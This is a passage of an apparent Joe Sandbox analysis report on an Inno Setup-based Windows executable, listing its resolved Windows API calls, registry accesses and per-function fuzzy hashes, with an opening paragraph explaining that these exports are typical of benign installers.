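The output is a triage list, not a verdict: SetProcessDEPPolicy, SetDllDirectoryW, SetSearchPathMode, the Wow64 file-system redirection pair, VerifyVersionInfoW and SHGetKnownFolderPath are exactly the exports a benign installer also resolves dynamically so that it still loads on Windows versions that lack them. What the list does give you is the set of caller addresses (the "sub" column, for instance 004531F0 for the Wow64 redirection pair) to jump to in the disassembly, and a quick check that no export was resolved that the report's static import table does not already show. The unresolved "6FAA1CD0.COMCTL32" entry is kept as-is; the plugin printed an address where it had no export name.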
                                                                                            APIs
                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DC3C
                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DCAC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryValue
                                                                                            • String ID: $=H
                                                                                            • API String ID: 3660427363-3538597426
                                                                                            • Opcode ID: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                            • Instruction ID: 5bd1c55a509b6dee259ffcee94d68868fe84ce326e73fb4cf6662c4527ef549e
                                                                                            • Opcode Fuzzy Hash: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                            • Instruction Fuzzy Hash: 9D414171E00529ABDB11DF95D881BAFB7B8EB04704F918466E810F7241D778AE00CBA5
                                                                                            APIs
                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A6A
                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A73
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID: .tmp
                                                                                            • API String ID: 1375471231-2986845003
                                                                                            • Opcode ID: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                            • Instruction ID: 2c169793aa1d4e8b0ae54453200dd0eeecd34c8d921a2c5b894f13e1de3ec917
                                                                                            • Opcode Fuzzy Hash: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                            • Instruction Fuzzy Hash: BD213575A002089BDB01EFA5C8429DEB7B8EF49305F50457BE801B7343DA3CAF058B69
                                                                                            APIs
                                                                                              • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                              • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                              • Part of subcall function 00483A7C: GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                              • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                              • Part of subcall function 00483A7C: GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                              • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                              • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                              • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                              • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483DB6
                                                                                              • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(0000009C,?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483E08
                                                                                              • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                              • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModuleVersion$CurrentErrorInfoLibraryLoadModeNativeProcessSystem
                                                                                            • String ID: SHGetKnownFolderPath$shell32.dll
                                                                                            • API String ID: 3869789854-2936008475
                                                                                            • Opcode ID: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                            • Instruction ID: 8066e8dcbdf9c94243579ba2519058cd674f052446347c20ec70bbddfecd8a90
                                                                                            • Opcode Fuzzy Hash: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                            • Instruction Fuzzy Hash: 1021F1B06103116AC700BFBE599611B3BA5EB9570C380893FF904DB391D77E68149B6E
                                                                                            APIs
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C92C,00000000,0047C942), ref: 0047C63A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID: RegisteredOrganization$RegisteredOwner
                                                                                            • API String ID: 3535843008-1113070880
                                                                                            • Opcode ID: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                                                            • Instruction ID: 97ba07fcc0924f8d698b93a4c32f8f7a3ceb81663af41ec066a5e596666b9838
                                                                                            • Instruction Fuzzy Hash: F5F09060700204ABEB00D6A8ACD2BAA3769D750304F60907FA1058F382C679EE019B5C
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475271
                                                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475288
                                                                                              • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: CloseCreateErrorFileHandleLast
                                                                                            • String ID: CreateFile
                                                                                            • API String ID: 2528220319-823142352
                                                                                            • Opcode ID: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                                                            • Instruction ID: b0794b45f16520e4762b2717541816a935241bfc2e667b83be7f23d95be3de9d
                                                                                            • Instruction Fuzzy Hash: 99E06D702403447FEA10FA69CCC6F4A77989B04728F10C152BA48AF3E3C5B9FC808A58
                                                                                            APIs
                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: Open
                                                                                            • String ID: System\CurrentControlSet\Control\Windows$;H
                                                                                            • API String ID: 71445658-2565060666
                                                                                            • Opcode ID: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                                            • Instruction ID: 60e43675bb36a9eef4a15598a1848ca3f705ecc445ee8c9fe52fc6b05f1352bb
                                                                                            • Instruction Fuzzy Hash: 29D09E72950128BB9B009A89DC41DFB775DDB15760F45441BF9049B141C5B4AC5197E4
                                                                                            APIs
                                                                                              • Part of subcall function 00457044: CoInitialize.OLE32(00000000), ref: 0045704A
                                                                                              • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                              • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                            • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                                            • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                                            • API String ID: 2906209438-2320870614
                                                                                            • Opcode ID: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                                                            • Instruction ID: 7fba65882f7194314ab185764ebfac318737a269d5660949bdaf7135ffc1064c
                                                                                            • Instruction Fuzzy Hash: ECC08CA074860093CB40B3FA344320E1841AB8071FB10C07F7A04A66C7DE3C88088B2E
                                                                                            APIs
                                                                                              • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                              • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                            • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: AddressErrorLibraryLoadModeProc
                                                                                            • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                            • API String ID: 2492108670-2683653824
                                                                                            • Opcode ID: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                            • Instruction ID: c0603f0a452a360a01ce82207306765f02b8a986224f2e77b24b084cc810d505
                                                                                            • Instruction Fuzzy Hash: 44B092A060074086DB40B7A298D262B28269740319B20843BB0CC9BA95EB3E88240B9F
                                                                                            APIs
                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448709), ref: 0044864C
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486CD
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID:
                                                                                            • API String ID: 2574300362-0
                                                                                            • Opcode ID: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                                                            • Instruction ID: 2eaa58f6359003fef9dee836e3db1fa56ae38c906bc4f4c4d93ca6671f7cd4fb
                                                                                            • Instruction Fuzzy Hash: 14515470E00105AFDB40EF95C491AAEBBF9EB45319F11817FE414BB391DA389E05CB99
                                                                                            APIs
                                                                                            • GetSystemMenu.USER32(00000000,00000000,00000000,00481DB4), ref: 00481D4C
                                                                                            • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00481D5D
                                                                                            • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00481D75
                                                                                            Similarity
                                                                                            • API ID: Menu$Append$System
                                                                                            • String ID:
                                                                                            • API String ID: 1489644407-0
                                                                                            • Opcode ID: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                                                            • Instruction ID: 44f8b16540ed1c6eecf525242fd074403e334eda66194076213ef08da8c10300
                                                                                            • Instruction Fuzzy Hash: 3431D4307043441AD721FB769C82BAE3A989F15318F54483FF901AB2E3CA7CAD09879D
                                                                                            APIs
                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424412
                                                                                            • TranslateMessage.USER32(?), ref: 0042448F
                                                                                            • DispatchMessageA.USER32(?), ref: 00424499
                                                                                            Similarity
                                                                                            • API ID: Message$DispatchPeekTranslate
                                                                                            • String ID:
                                                                                            • API String ID: 4217535847-0
                                                                                            • Opcode ID: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                                            • Instruction ID: 8eae6dca0d2455523dd27ca57e4683f6da326f6f2f90499d04ddbfd693f83f9d
                                                                                            • Instruction Fuzzy Hash: E3116D303043205AEB20FA24A941B9F73D4DFC5758F80481EFC99972C2D77D9D49879A
                                                                                            APIs
                                                                                            • SetPropA.USER32(00000000,00000000), ref: 0041666A
                                                                                            • SetPropA.USER32(00000000,00000000), ref: 0041667F
                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166A6
                                                                                            Similarity
                                                                                            • API ID: Prop$Window
                                                                                            • String ID:
                                                                                            • API String ID: 3363284559-0
                                                                                            • Opcode ID: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
                                                                                            • Instruction ID: 6913c5f2d07602d921388148e43cadd8ab2d6729f30613f48e4cae6714e3bc13
                                                                                            • Instruction Fuzzy Hash: ACF01271701210ABDB10AB599C85FA732DCAB09714F16057AB905EF286C778DC40C7A8
                                                                                            APIs
                                                                                            • IsWindowVisible.USER32(?), ref: 0041EE64
                                                                                            • IsWindowEnabled.USER32(?), ref: 0041EE6E
                                                                                            • EnableWindow.USER32(?,00000000), ref: 0041EE94
                                                                                            Similarity
                                                                                            • API ID: Window$EnableEnabledVisible
                                                                                            • String ID:
                                                                                            • API String ID: 3234591441-0
                                                                                            • Opcode ID: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                                            • Instruction ID: 3b4cb379701a2ac24b7d0c87bf9454d2e26b3d0fb89a85d5a5a22e513a73856b
                                                                                            • Instruction Fuzzy Hash: EAE06DB5100301AAE301AB2BDC81B5B7A9CAB54350F05843BA9089B292D63ADC408B7C
                                                                                            APIs
                                                                                            • SetActiveWindow.USER32(?), ref: 0046A02D
                                                                                            Similarity
                                                                                            • API ID: ActiveWindow
                                                                                            • String ID: PrepareToInstall
                                                                                            • API String ID: 2558294473-1101760603
                                                                                            • Opcode ID: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                                                            • Instruction ID: c614f106b7f0b4f176116dff63491c2ec041d81708a05a15fd0d1780f22877a3
                                                                                            • Opcode Fuzzy Hash: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                                                            • Instruction Fuzzy Hash: 97A14934A00109DFCB00EF99D986EDEB7F5AF48304F5540B6E404AB362D738AE45CB9A
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: /:*?"<>|
                                                                                            • API String ID: 0-4078764451
                                                                                            • Opcode ID: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                                                            • Instruction ID: 6c3526c54916fe71946563460b5bd12015a165326d65a32731909bc5939f884d
                                                                                            • Opcode Fuzzy Hash: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                                                            • Instruction Fuzzy Hash: CF71C370A40215BADB10E766DCD2FEE7BA19F05308F148067F580BB292E779AD458B4E
                                                                                            APIs
                                                                                            • SetActiveWindow.USER32(?), ref: 00482676
                                                                                            Similarity
                                                                                            • API ID: ActiveWindow
                                                                                            • String ID: InitializeWizard
                                                                                            • API String ID: 2558294473-2356795471
                                                                                            • Opcode ID: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                                                            • Instruction ID: 0fabbc08dbff6a0894d12042e1c617afa12541eacf44f0b659f2bb150b55c2ae
                                                                                            • Opcode Fuzzy Hash: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                                                            • Instruction Fuzzy Hash: 8311C130204200AFD700EB69EED6B1A37E4E764328F60057BE404D72A1EA796C41CB5E
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047C740,00000000,0047C942), ref: 0047C539
                                                                                            Strings
                                                                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047C509
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                                            • API String ID: 47109696-1019749484
                                                                                            • Opcode ID: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
                                                                                            • Instruction ID: acdf9366f140fa0c09696ff4b806567a5b27613a006b44f2785fa8682630d216
                                                                                            • Opcode Fuzzy Hash: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
                                                                                            • Instruction Fuzzy Hash: 6CF0823170052477DA00A65E6C82B9FA79D8B84758F60403FF508DB242EABAEE0243EC
                                                                                            APIs
                                                                                            • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                                            Strings
                                                                                            • Inno Setup: Setup Version, xrefs: 0046EE65
                                                                                            Similarity
                                                                                            • API ID: Value
                                                                                            • String ID: Inno Setup: Setup Version
                                                                                            • API String ID: 3702945584-4166306022
                                                                                            • Opcode ID: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
                                                                                            • Instruction ID: 37dbbd71146fd60ed96ba35b84ff74d599aeccd68d0f9eb37ee109455dfe34ad
                                                                                            • Opcode Fuzzy Hash: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
                                                                                            • Instruction Fuzzy Hash: B1E06D753012043FE710AA2B9C85F5BBADCDF88365F10403AB908DB392D578DD0181A9
                                                                                            APIs
                                                                                            • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                                                            Similarity
                                                                                            • API ID: Value
                                                                                            • String ID: NoModify
                                                                                            • API String ID: 3702945584-1699962838
                                                                                            • Opcode ID: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
                                                                                            • Instruction ID: 84621f748531697c6bb4a8e0450a59e651a2caf9945441e4ffcb8bd5fa838dfd
                                                                                            • Opcode Fuzzy Hash: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
                                                                                            • Instruction Fuzzy Hash: F6E04FB4640308BFEB04DB55CD4AF6B77ECDB48714F10405ABA049B281E674FE00C669
                                                                                            APIs
                                                                                            • GetACP.KERNEL32(?,?,00000001,00000000,0047E753,?,-0000001A,00480609,-00000010,?,00000004,0000001B,00000000,00480956,?,0045DB68), ref: 0047E4EA
                                                                                              • Part of subcall function 0042E31C: GetDC.USER32(00000000), ref: 0042E32B
                                                                                              • Part of subcall function 0042E31C: EnumFontsA.GDI32(?,00000000,0042E308,00000000,00000000,0042E374,?,00000000,00000000,004809BD,?,?,00000001,00000000,00000002,00000000), ref: 0042E356
                                                                                              • Part of subcall function 0042E31C: ReleaseDC.USER32(00000000,?), ref: 0042E36E
                                                                                            • SendNotifyMessageA.USER32(0001042E,00000496,00002711,-00000001), ref: 0047E6BA
                                                                                            Similarity
                                                                                            • API ID: EnumFontsMessageNotifyReleaseSend
                                                                                            • String ID:
                                                                                            • API String ID: 2649214853-0
                                                                                            • Opcode ID: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
                                                                                            • Instruction ID: a62c935d52da393e7312112ce75ddb0898731394ffd2a16b1d4fc3e518f8127d
                                                                                            • Opcode Fuzzy Hash: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
                                                                                            • Instruction Fuzzy Hash: 5B5195746001049BC710FF67E98169A37E5EB58308B90C67BA8049B3A6DB3CED45CB9D
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0047DF83,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047DF3D
                                                                                              • Part of subcall function 0042CA00: GetSystemMetrics.USER32(0000002A), ref: 0042CA12
                                                                                            Similarity
                                                                                            • API ID: ByteCharMetricsMultiSystemWide
                                                                                            • String ID: /G
                                                                                            • API String ID: 224039744-2088674125
                                                                                            • Opcode ID: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                                                            • Instruction ID: 84c81a41a939c89cd5cf89585cf0d961f9543ff151f38a86aad590f5673b43e0
                                                                                            • Opcode Fuzzy Hash: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                                                            • Instruction Fuzzy Hash: 53518070A04215AFDB21DF55D8C4FAA7BB8EF64318F118077E404AB3A1C778AE45CB99
                                                                                            APIs
                                                                                            • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DF6C
                                                                                            • RegCloseKey.ADVAPI32(?,0042DFDD,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DFD0
                                                                                            Similarity
                                                                                            • API ID: CloseEnum
                                                                                            • String ID:
                                                                                            • API String ID: 2818636725-0
                                                                                            • Opcode ID: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                                                            • Instruction ID: d62689c7b7995b9893119ef97773413105dd68debc8ff02f2d4f9d8a28cc91ff
                                                                                            • Opcode Fuzzy Hash: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                                                            • Instruction Fuzzy Hash: DD31B270F04258AEDB11DFA6DD42BAEBBB9EB49304F91407BE501E6280D6785E01CA2D
                                                                                            APIs
                                                                                              • Part of subcall function 00495508: GetDC.USER32(00000000), ref: 00495519
                                                                                              • Part of subcall function 00495508: SelectObject.GDI32(00000000,00000000), ref: 0049553B
                                                                                              • Part of subcall function 00495508: GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495AB9), ref: 0049554F
                                                                                              • Part of subcall function 00495508: GetTextMetricsA.GDI32(00000000,?), ref: 00495571
                                                                                              • Part of subcall function 00495508: ReleaseDC.USER32(00000000,00000000), ref: 0049558E
                                                                                            • MulDiv.KERNEL32(?,?,00000006), ref: 00495AFB
                                                                                            • MulDiv.KERNEL32(?,?,0000000D), ref: 00495B10
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Text$ExtentMetricsObjectPointReleaseSelect
                                                                                            • String ID:
                                                                                            • API String ID: 844173074-0
                                                                                            • Opcode ID: 0ae29da0906a83ea8dd71af8a3b995980c0d8de00cfc8428832f083f9a8e0037
                                                                                            • Instruction ID: abe69acf9078cd54ec5aa8dad2b6463f40ee800cf76dae291ad797c0d2ca63cb
                                                                                            • Opcode Fuzzy Hash: 0ae29da0906a83ea8dd71af8a3b995980c0d8de00cfc8428832f083f9a8e0037
                                                                                            • Instruction Fuzzy Hash: FC21D6713012009FDB50DF69C8C5AA637E9EB89314F6446B9FD08CF29ADB35EC058B65
                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 0045283C
                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 00452844
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateErrorLastProcess
                                                                                            • String ID:
                                                                                            • API String ID: 2919029540-0
                                                                                            • Opcode ID: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                            • Instruction ID: fcc055d8c1a696a2a0db1e32a085008d871673fec5534948229a16d4440eefa6
                                                                                            • Opcode Fuzzy Hash: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                            • Instruction Fuzzy Hash: A2113C72600208AF8B40DEA9DD41D9F77ECEB4E310B114567FD18D3241D678EE148B68
                                                                                            APIs
                                                                                            • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040ADF2
                                                                                            • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040AF4F,00000000,0040AF67,?,?,?,00000000), ref: 0040AE03
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$FindFree
